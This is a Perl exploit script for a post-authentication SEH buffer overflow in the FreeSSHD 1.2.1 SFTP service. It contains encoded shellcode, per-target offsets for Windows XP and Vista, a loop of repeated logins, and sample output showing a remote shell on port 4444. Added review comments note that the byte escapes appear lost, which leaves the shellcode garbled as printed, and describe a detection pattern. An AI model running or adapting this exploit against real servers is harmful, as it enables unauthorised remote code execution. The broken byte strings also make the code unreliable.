#!/usr/bin/perl
###############################################################################
# FreeSSHD 1.2.1 (Post Auth) Remote Seh Overflow http://freeddsshd.com/
#
# Exploit based on securfrog Poc http://www.milw0rm.com/exploits/5709
#
#
#
# Coded by Matteo Memelli aka ryujin                                          #
# `Spaghetti & PwnSauce`                                                      #
# >> http://www.be4mind.com http://www.gray-world.net<<                       #
#                                                                             #
#                                                                             #
# Tested on Windows XPSp2 EN / Windows Vista Ultimate EN                      #
# Offset for SEH overwrite is 3 Bytes greater in Windows Vista                #
# Reliable Exploitation needs SSC :)                                          #
#                                                                             #
#                                                                             #
# `I Miss Python but...I Gotta learn some perl too ;)`                        #
# `Cheers to #offsec friends and to my bro s4tan`                             #
###############################################################################
#
#
# bt POCS # ./freeSSHD_exploit.pl 10.150.0.228 22 pwnme pwnme 2              #
# [+] FreeSSHD 1.2.1 (Post Auth) Remote Seh Overflow                          #
# [+] Coded by Matteo Memelli aka ryujin                                      #
# [+] SSC: Stack Spring Cleaning... >> rm thisJunk <<                         #
# [+] Exploiting FreSSHDService...                                            #
# [+] Sending Payload...                                                      #
# [*] Done! CTRL-C and check your shell on port 4444                          #
#                                                                             #
#                                                                             #
# bt POCS # nc 10.150.0.2284444                                               #
# Microsoft Windows [Version 6.0.6000]                                        #
# Copyright (c) 2006 Microsoft Corporation. All rights reserved.              #
#                                                                             #
#                                                                             #
#                                                                             #
# C:UsersryujinDesktop>                                                       #
#
#
#
###############################################################################
use strict;
use Net::SSH2;
# NOTE(review): no `use warnings;` -- under warnings the numeric `==`
# comparisons against the strings '1'/'2' in the TARGET check below would
# be reported.
# Five positional arguments are required: HOST PORT USER PASS TARGET.
my $numArgs = $#ARGV + 1;
if ($numArgs != 5) {
print "Usage : ./freeSSHD_exploit.pl HOST PORT USER PASS TARGETn";
print "TARGET: 1 -> XPSP2n";
print "TARGET: 2 -> VISTAn";
exit;
}
# [*] Using Msf::Encoder::PexAlphaNum with final size of 709 bytes
# ExitFunc=SEH
# Encoded payload string.
# NOTE(review): every string literal in this file reads as `x90`, `xeb`, ...
# with no backslash; the escapes appear to have been lost in transcription,
# so as written these literals are plain ASCII letters and digits rather than
# the byte values the original comments describe. The same applies to the
# `n` at the end of every print string (the newline escape is missing).
my $shellcode =
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49".
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36".
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34".
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41".
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx46x4bx4e".
"x4dx54x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x36x4bx48".
"x4ex56x46x42x46x32x4bx38x45x44x4ex33x4bx48x4ex47".
"x45x50x4ax37x41x30x4fx4ex4bx58x4fx44x4ax31x4bx58".
"x4fx55x42x52x41x30x4bx4ex49x44x4bx48x46x33x4bx38".
"x41x30x50x4ex41x53x42x4cx49x39x4ex4ax46x48x42x4c".
"x46x47x47x50x41x4cx4cx4cx4dx50x41x30x44x4cx4bx4e".
"x46x4fx4bx33x46x55x46x32x4ax42x45x37x45x4ex4bx48".
"x4fx35x46x42x41x30x4bx4ex48x46x4bx48x4ex50x4bx34".
"x4bx48x4fx45x4ex31x41x50x4bx4ex43x50x4ex42x4bx58".
"x49x48x4ex46x46x32x4ex41x41x36x43x4cx41x53x4bx4d".
"x46x56x4bx48x43x34x42x43x4bx58x42x44x4ex30x4bx48".
"x42x37x4ex41x4dx4ax4bx48x42x54x4ax50x50x45x4ax36".
"x50x38x50x54x50x50x4ex4ex42x45x4fx4fx48x4dx48x46".
"x43x35x48x46x4ax46x43x43x44x53x4ax46x47x57x43x37".
"x44x33x4fx35x46x55x4fx4fx42x4dx4ax46x4bx4cx4dx4e".
"x4ex4fx4bx43x42x55x4fx4fx48x4dx4fx55x49x58x45x4e".
"x48x36x41x58x4dx4ex4ax50x44x50x45x55x4cx36x44x50".
"x4fx4fx42x4dx4ax36x49x4dx49x30x45x4fx4dx4ax47x45".
"x4fx4fx48x4dx43x35x43x35x43x45x43x35x43x35x43x54".
"x43x35x43x54x43x35x4fx4fx42x4dx48x46x4ax46x41x31".
"x4ex35x48x56x43x35x49x48x41x4ex45x39x4ax36x46x4a".
"x4cx51x42x37x47x4cx47x45x4fx4fx48x4dx4cx36x42x31".
"x41x55x45x35x4fx4fx42x4dx4ax46x46x4ax4dx4ax50x32".
"x49x4ex47x45x4fx4fx48x4dx43x55x45x45x4fx4fx42x4d".
"x4ax56x45x4ex49x34x48x58x49x54x47x35x4fx4fx48x4d".
"x42x45x46x45x46x45x45x45x4fx4fx42x4dx43x59x4ax46".
"x47x4ex49x37x48x4cx49x37x47x35x4fx4fx48x4dx45x45".
"x4fx4fx42x4dx48x46x4cx46x46x46x48x36x4ax36x43x56".
"x4dx46x49x58x45x4ex4cx56x42x55x49x55x49x32x4ex4c".
"x49x38x47x4ex4cx46x46x34x49x38x44x4ex41x33x42x4c".
"x43x4fx4cx4ax50x4fx44x54x4dx42x50x4fx44x44x4ex52".
"x43x39x4dx58x4cx47x4ax43x4bx4ax4bx4ax4bx4ax4ax36".
"x44x37x50x4fx43x4bx48x51x4fx4fx45x37x46x54x4fx4f".
"x48x4dx4bx45x47x45x44x35x41x45x41x55x41x35x4cx46".
"x41x50x41x35x41x35x45x35x41x55x4fx4fx42x4dx4ax36".
"x4dx4ax49x4dx45x30x50x4cx43x35x4fx4fx48x4dx4cx56".
"x4fx4fx4fx4fx47x53x4fx4fx42x4dx4bx38x47x45x4ex4f".
"x43x48x46x4cx46x36x4fx4fx48x4dx44x35x4fx4fx42x4d".
"x4ax36x42x4fx4cx38x46x30x4fx35x43x35x4fx4fx48x4d".
"x4fx4fx42x4dx5a";
# Per-target filler pieces. The "xp" / "vi" pairs differ only in length
# (242+24 vs 226+43); the file header states the SEH offset is 3 bytes
# greater on Vista, which matches the difference between the two sums.
my $nops = "x90"x64;
my $offset1xp = "x41"x242;
my $offset1vi = "x41"x226;
my $offset2xp = "x41"x24;
my $offset2vi = "x41"x43;
# Fixed byte strings. Their roles are not documented on the page beyond
# their names ($ppr, $jmps*, $jmpn); presumably the SEH-record overwrite and
# the jumps back into the payload -- name-based, not confirmed here.
my $ppr = "xdex13x40";
my $jmpsxp = "xebxe1x90x90";
my $jmpsvi = "xebxcex90x90";
my $jmpn = "xe9x23xfcxffxff";
# Positional arguments. int() of a non-numeric PORT silently yields 0, so
# a malformed port only surfaces as a failed connect below.
my $ip = $ARGV[0];
my $port = int($ARGV[1]);
my $user = $ARGV[2];
my $pass = $ARGV[3];
my $payload = '';
# TARGET selects the filler layout. `==` is a numeric comparison, so any
# argument that numifies to 1 or 2 (e.g. "1abc", "2.0") is also accepted.
if ($ARGV[4] == '1')
{
$payload = $nops.$shellcode.$offset1xp.$jmpn.$offset2xp.$jmpsxp.$ppr;
}
elsif ($ARGV[4] == '2')
{
$payload = $nops.$shellcode.$offset1vi.$jmpn.$offset2vi.$jmpsvi.$ppr;
}
else
{
print "[-] TARGET ERROR!n";
exit;
}
print "[+] FreeSSHD 1.2.1 (Post Auth) Remote Seh Overflown";
print "[+] Coded by Matteo Memelli aka ryujinn";
print "[+] SSC: Stack Spring Cleaning... >> rm thisJunk <<n";
# If you start the exploit before any other connection, everything is fine
# otherwise exploit could become less reliable.
# So let's rm some junk before exploiting our app...
# Thirty complete connect / password-auth / disconnect cycles with the same
# credentials, before the real request is made. Any failure aborts the
# script via die.
# Detection note: a burst of ~30 short-lived, successfully authenticated
# SSH sessions from one source, immediately followed by an SFTP opendir
# carrying an abnormally long path, is the observable pattern of this
# script. Because it is post-authentication, valid credentials are a
# prerequisite; limiting which accounts may log in to the service limits
# exposure.
for (my $count = 30; $count >= 1; $count--) {
my $ssh2 = Net::SSH2->new();
$ssh2->connect($ip, $port) || die "[-] Connnection Failed!";
$ssh2->auth_password($user,$pass)|| die "Wrong Username or Passwd!";
$ssh2->disconnect();
}
# Final session. Note that all three status lines, including "Done!", are
# printed before the request below is actually issued, so the output does
# not reflect whether the request succeeded.
my $ssh2 = Net::SSH2->new();
$ssh2->connect($ip, $port) || die "[-] Connnection Failed!";
$ssh2->auth_password($user,$pass)|| die "Wrong Username or Passwd!";
print "[+] Exploiting FreSSHDService...n";
print "[+] Sending Payload...n";
print "[*] Done! CTRL-C and check your shell on port 4444n";
# The oversized string is passed as the directory name of an SFTP opendir
# request; the return value is stored in $bad but never examined. The
# session is never disconnected explicitly -- the script simply exits.
my $sftp = $ssh2->sftp();
my $bad = $sftp->opendir($payload);
exit;